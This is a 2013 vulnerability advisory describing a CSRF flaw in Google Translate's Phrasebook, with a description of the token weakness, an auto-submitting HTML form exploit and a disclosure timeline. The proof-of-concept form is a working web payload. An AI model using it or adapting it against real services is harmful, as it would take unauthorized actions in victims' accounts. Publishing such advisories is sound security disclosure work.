+------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title           : Google Translate CSRF Vulnerability 
# Date                    : 06/20/2013
# Author                  : Ivano Binetti (http://www.ivanobinetti.com)
# Affected Web site       : http://translate.google.com
# Original Advisory:      : http://www.webapp-security.com/2013/06/translate-google-com-csrf-vulnerability/
+------------------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Vulnerability Description 
2)Exploit
3)Vulnerability Timeline
+------------------------------------------------------------------------------------------------------------------------------------------+
1)Vulnerability Description 
I discovered a new CSRF vulnerability on translate.google.com web site which could allow an attacker to insert items (Words/Phrases/Urls 
and related translations) into the user's Phrasebook. Furthermore an attacker could also inserta potentially malicious Urls - into the 
above mentioned Phrasebook - towards which the victim could be redirected simply clicking on the "Go to <website>" right-click option on 
translate.google.com.
The vulnerability is related to a problem into the generation of the "xt" anti-CSRF token which is not correctly associated with the user session,
allowing to use any previous generated anti-CSRF parameter - for that specific user- in order to carry out this attack. 

2)Exploit
Following a simply exploit in order to insert, into a Phrasebook, the new phrase "word_example" and the url "www.ivanobinetti.com" (my blog) 
as translation:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://translate.google.com/translate_a/sg?client=t&cm=a&sl=en&tl=it&ql=4&hl=en&xt=<anti-CSRF token">
<input type="hidden" name="q" value="word_example"/>
<input type="hidden" name="utrans" value="www.ivanobinetti.com"/>
</form>
</body>
</html>

Note: executing the exploit the victim will receive the message to open or download a "sg" file. Even if the victim does not open or 
download this file the new item will be added into the Phrasebook.

3)Vulnerability Timeline
04/12/2013: Exploit has been sent to Google security team (security@google.com)
04/12/2013: First prompt reply from Google security team telling me that the exploit does not work
04/12/2013: My reply explaining the details of the vulnerability and related exploit
04/13/2013: Google security team contacted me admitting the vulnerability and that they were considering if assign me a reward 
04/17/2013: Google security team told me that the vulnerability/problem was already known by Google and that no reward 
there would been for me :(
06/20/2013: After more than 2 months I checked that the problem is still in place, so I decided to publish the vulnerability